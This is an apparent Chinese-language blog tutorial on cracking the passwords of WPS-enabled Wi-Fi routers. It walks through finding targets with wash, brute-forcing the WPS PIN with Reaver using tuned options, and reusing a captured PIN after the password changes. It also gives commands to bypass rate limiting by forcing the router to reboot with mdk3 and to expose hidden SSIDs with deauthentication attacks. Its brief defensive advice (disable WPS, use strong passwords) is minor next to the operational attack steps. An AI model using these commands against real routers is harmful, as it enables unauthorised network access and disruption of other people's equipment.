使用Reaver破解开启了WPS功能的wifi密码(wpa/wpa2)
来自wikipeida:
Wi-Fi保护设置(简称WPS,全称Wi-Fi Protected Setup)是一个无线网络安全标准,旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟(Wi-Fi Alliance)于2006年制定。
在2011年12月28日安全专家Stefan Viehbock报出此标准的一个重大安全漏洞,此漏洞允许远程攻击者使用暴力攻击在几小时内就能获取WPS的PIN码和WPA/WPA2的PSK码。一些新出产的无线路默认启动WPS功能,所以现在建议用户关闭无线路由器上的WPS一键加密功能,虽然有些无线器上无法关闭此功能。
WPS的目的是简化用户输入密码的步骤;在某个设备连接wifi,需要输入密码时,只要按一下无线路由器上的wps按钮就可以了。
Reaver是除字典破解之外的另一个选择:
如果无线路由器开启了WPS,就不必使用上面的破解方法了。
WPS的pin码并没有加密。Reaver会暴力破解pin码,找到pin码也就找到了密码。一般用时也不短。
注意:
- 网卡支持数据包注入,一般笔记本不支持
- 要求无线信号强
- 如果发送pin码过快,有可能造成路由器崩溃;就类似对服务器的DDOS攻击。
- Reaver有很多选项,我只使用最基本的选项,你也许需要根据情况使用其他选项。查看帮助:reaver ?
执行
aircrack-ng使用方法 Linux 篇(推荐)
中的前四步,打开无线网卡的的监控模式。
1)找到开启WPS功能的无线路由器
我们不用逐一测试,而是使用wash命令。
wash -i wlan1mon
如果什么也没有表示周围没有开启WPS的无线路由器。记住要破解wifi的BSSID。
2)开始破解密码
reaver -i wlan1mon -b C0:61:18:59:3E:9A -vv 推荐使用 reaver -i wlan0mon -b C0:61:18:59:3E:9A -a -S -d9 -t9 -vv
因为–d9 –t9防止路由器pin死
参数可参数说明:
-i 无线网卡名称
-b 目标AP的mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高破解速度
-vv 显示更多的非严重警告(注意这是 2 个小写字母 v)
-d 即delay每穷举一次的闲置时间 预设为1秒
-c 信道编号
-p PIN码四位或八位 //可以用8位直接找到密码。
最后,不要忘了结束无线网卡的监控模式:
airmon-ng stop wlan0mon
破解完成之后,查看并记录下 PIN码 和 密码
获取到 PIN码 后,以后即便路由器更换了密码,我们也可以很迅速地通过 PIN码 重新获得新密码。举例:
reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -p 12345670
注意:
1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息,那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。
2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息,这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的,当连续使用超过某个次数的 PIN码 后,路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能,要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (这是上面的目标AP的MAC地址)命令让路由器主动重启或被动重启以恢复 WPS 功能。
总结:wps这个功能不用就把它关闭了吧。
一个小实验:
我看到有人说隐藏SSID可以让wifi更不容易被破解,我就来测试一下。
隐藏SSID就是把你老大的AP隐藏起来,不让别人搜索到。请注意,这样的话,在连接wifi时就要手动输入AP名。
airodump-ng <处于监听模式的网卡名称> airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 wlan1mon aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan1mon
破解密码的方法不变;使用上面两个命令就可以轻松得到ap名。
事实证明,隐藏SSID并不管啥事;其实设置一个复杂的密码比隐藏SSID要管用的多。
管理员已关闭本篇文章评论!